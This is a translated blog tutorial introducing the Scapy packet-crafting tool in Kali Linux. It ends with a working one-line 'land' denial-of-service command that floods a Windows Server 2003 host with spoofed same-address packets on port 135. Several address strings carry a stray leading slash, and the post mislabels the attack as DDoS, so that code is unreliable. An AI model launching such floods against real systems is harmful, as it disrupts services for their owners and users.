Scapy is a universal tool for implementing network attacks.
Oleg Petukhov, lawyer in the field of international law and personal data protection, information security specialist security, protection of information and personal data.
Telegram channel: https://t.me/protectioninformation
Telegram Group: https://t.me/informationprotection1
Website: https://legascom.ru
Email: online@legascom.ru
#informationprotection #informationsecurity
Before starting to consider the types of network attacks, I would like to introduce the reader to another interesting and flexible tool included in Kali Linux, which is the Scapy utility. This flexible and functional utility is written in Python. This utility is designed to manipulate network packets. With its help, you can assemble an IP packet of the necessary structure necessary for conducting network attacks.
Before you start working with Scapy, you need to remember the structure of the IP packet.
When working with the Scapy utility, we will independently fill in these fields with the necessary information.
So, let's launch Scapy.
root@kali:~# scapy
>>>
After launching the utility, the input prompt is ">>>". The presence of this prompt indicates that Scapy is in interactive mode and all commands entered will be interpreted by the utility.
First, let's look at the current configuration.
>>> conf
The conf command displays the current settings from the configuration file.
Now we need to create our own package. As you know, the TCP/IP stack in various operating systems is based on compliance with the RFC standards defining network interaction. However, in order to carry out various attacks, the created packages do not always have to fully comply with the RFC standards.
In Scapy, first of all, you need to define the necessary variables and attributes of the package. So, the variable x will determine the ttl value of the packet, which is 64.
>>> x=IP(ttl=64)
>>> x
Next, we will add additional attributes to our package. First of all, we need the sender and recipient addresses. In the example below, the sender is 192.168.1.101 and the recipient is 192.168.1.122.
>>> x.src="/192.168.1.101"
>>> x.dst="192.168.1.122"
You can check the current values of the variable x by simply specifying the name of this variable in the interpreter.
>>> x
In addition, Scapy has many built-in functions. You can find out these functions using the lsc command.
>>> lsc()
As another example, let's use the "send" command. This command is used when we need to send a package. As an example, let's try to send a packet that we created in the variable x.
>>> send(x)
As you can see, our specially created package was sent to the recipient's address. Similarly, you can specify other parameters of the IP packet, such as window_size, flags, fragmentation, recognition, sequence number.
Now let's use Scapy to launch a small DDoS attack. Let's say we have a target system running Windows Server 2003 (oddly enough, there are still hundreds of thousands of servers running this OS) and vulnerable to a "land" type attack. This DoS attack consists of sending a large number of packets with the same IP addresses and ports of the sender and recipient. As a result of this attack, the machine will not necessarily freeze, but a slowdown in the system will definitely occur. For example, such an attack can be critical for web servers.
Using Scapy, this attack can be implemented as follows.
>>> send(IP(src="/192.168.1.122", dst="192.168.1.122")/TCP(sport=135,dport=135), count=2000)
In this example:
send – sending a packet;
IP is the protocol used;
src="/192.168.1.122" is the source of the packet;
dst="192.168.1.122" is the receiver of the packet;
TCP is a transport layer protocol;
sport=135 – source port;
dport=135 – recipient's port;
count=2000 – the number of packets we want to send.
Scapy is not only a means to implement denial of service attacks.
Using this utility, you can construct any package with the necessary fields and contents. Therefore, I would recommend using this tool when conducting information security audits.
In the following posts, we will return to the consideration of attacks at the network level.
